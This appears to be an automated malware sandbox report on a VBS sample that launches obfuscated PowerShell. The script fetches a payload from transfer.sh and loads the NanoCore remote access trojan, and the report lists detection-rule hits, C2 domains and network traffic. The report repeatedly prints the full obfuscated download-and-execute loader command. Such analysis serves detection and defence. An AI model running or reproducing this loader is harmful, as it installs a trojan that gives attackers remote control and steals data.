%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*','6');Invoke-Expression (-join ($SOS -spl

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/yxvc69/edrftgH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*','6');Invoke-Expression (-join ($SOS -spl

Sigma detected: T1086 PowerShell Execution

Show sources

Source: Pipe created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132761377237032547.6368.DefaultAppDomain.powershell

Stealing of Sensitive Information:

Sigma detected: NanoCore

Show sources

Source: File created

Remote Access Functionality:

Sigma detected: NanoCore

Show sources

Source: File created

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for domain / URL

Show sources

Source: newjan.duckdns.org

Virustotal: Detection: 10%

Perma Link

Source: unknown

HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49734 version: TLS 1.0

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000003.394270405.00000259E35AD000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: aspnet_compiler.exe, 00000017.00000003.461956661.00000000041C7000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: aspnet_compiler.exe, 00000017.00000003.461956661.00000000041C7000.00000004.00000001.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: aspnet_compiler.exe, 00000017.00000003.461956661.00000000041C7000.00000004.00000001.sdmp
Source:	Binary string: System.pdb source: aspnet_compiler.exe, 00000017.00000003.413706311.00000000012E8000.00000004.00000001.sdmp
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: aspnet_compiler.exe, 00000017.00000003.461956661.00000000041C7000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: aspnet_compiler.exe, 00000017.00000003.461956661.00000000041C7000.00000004.00000001.sdmp

Networking:

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: newjan.duckdns.org

Source: Joe Sandbox View

ASN Name: PTPEU PTPEU

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: global traffic	HTTP traffic detected: GET /yxvc69/edrftg.txt HTTP/1.1Host: transfer.shConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /lkuFqc/yhujer.txt HTTP/1.1Host: transfer.sh

Source: Joe Sandbox View	IP Address: 144.76.136.153 144.76.136.153
Source: Joe Sandbox View	IP Address: 144.76.136.153 144.76.136.153

Source: unknown

HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49734 version: TLS 1.0

Source: global traffic

TCP traffic: 192.168.2.5:49776 -> 194.147.140.20:6700

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443

Source: powershell.exe, 00000002.00000002.396527512.00000259CAB50000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000002.00000002.396527512.00000259CAB50000.00000004.00000001.sdmp	String found in binary or memory: http://crl.v
Source: aspnet_compiler.exe, 00000017.00000003.461956661.00000000041C7000.00000004.00000001.sdmp	String found in binary or memory: http://google.com
Source: powershell.exe, 00000002.00000002.397499011.00000259CAF1C000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.397921057.00000259CB0A4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.396817836.00000259CAC61000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.397921057.00000259CB0A4000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.397499011.00000259CAF1C000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.397499011.00000259CAF1C000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.396657490.00000259CABE3000.00000004.00000001.sdmp	String found in binary or memory: https://go.microsoft.cop
Source: powershell.exe, 00000002.00000002.397499011.00000259CAF1C000.00000004.00000001.sdmp	String found in binary or memory: https://transfer.sh
Source: powershell.exe, 00000002.00000002.397921057.00000259CB0A4000.00000004.00000001.sdmp	String found in binary or memory: https://transfer.sh/lkuFqc/yhujer.txt(
Source: powershell.exe, 00000002.00000002.397274536.00000259CAE6E000.00000004.00000001.sdmp	String found in binary or memory: https://transfer.sh/yxvc69/edrftg.txt(

Source: unknown

DNS traffic detected: queries for: transfer.sh

Source: global traffic	HTTP traffic detected: GET /yxvc69/edrftg.txt HTTP/1.1Host: transfer.shConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /lkuFqc/yhujer.txt HTTP/1.1Host: transfer.sh

E-Banking Fraud:

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 23.3.aspnet_compiler.exe.41e9dcf.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 23.3.aspnet_compiler.exe.41cfd76.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 23.3.aspnet_compiler.exe.41e43a1.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 23.3.aspnet_compiler.exe.41e43a1.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 23.3.aspnet_compiler.exe.41e9dcf.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 23.3.aspnet_compiler.exe.41e9dcf.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 23.3.aspnet_compiler.exe.41cfd76.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 23.3.aspnet_compiler.exe.41cfd76.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000017.00000003.461956661.00000000041C7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: aspnet_compiler.exe PID: 3092, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Wscript starts Powershell (via cmd or directly)

Show sources

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/yxvc69/edrftgH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-e-X-!c-X-f-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-0-X-!5-X-58-X-%8-X-e-X-0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-0-X-3-X-0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-5-X-0-X-57-X-0-X-%d-X-!f-X-%-X-a-X-0-X-!5-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!-X-5-X-%7-X-%9-X-3b-X-0a-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-f-X-9-X-e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/yxvc69/edrftgH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-e-X-!c-X-f-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-0-X-!5-X-58-X-%8-X-e-X-0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-0-X-3-X-0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-5-X-0-X-57-X-0-X-%d-X-!f-X-%-X-a-X-0-X-!5-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!-X-5-X-%7-X-%9-X-3b-X-0a-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-f-X-9-X-e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('			Jump to behavior

Very long command line found

Show sources

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 3047
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 3047			Jump to behavior

Source: 15 Items Receipt.vbs, type: SAMPLE	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: amsi64_6280.amsi.csv, type: OTHER	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 23.3.aspnet_compiler.exe.41e9dcf.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 23.3.aspnet_compiler.exe.41e9dcf.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.aspnet_compiler.exe.41cfd76.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 23.3.aspnet_compiler.exe.41cfd76.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.aspnet_compiler.exe.41e43a1.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 23.3.aspnet_compiler.exe.41e43a1.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 23.3.aspnet_compiler.exe.41e9dcf.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 23.3.aspnet_compiler.exe.41e9dcf.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 23.3.aspnet_compiler.exe.41cfd76.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 23.3.aspnet_compiler.exe.41cfd76.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000003.416393768.0000022F43489000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
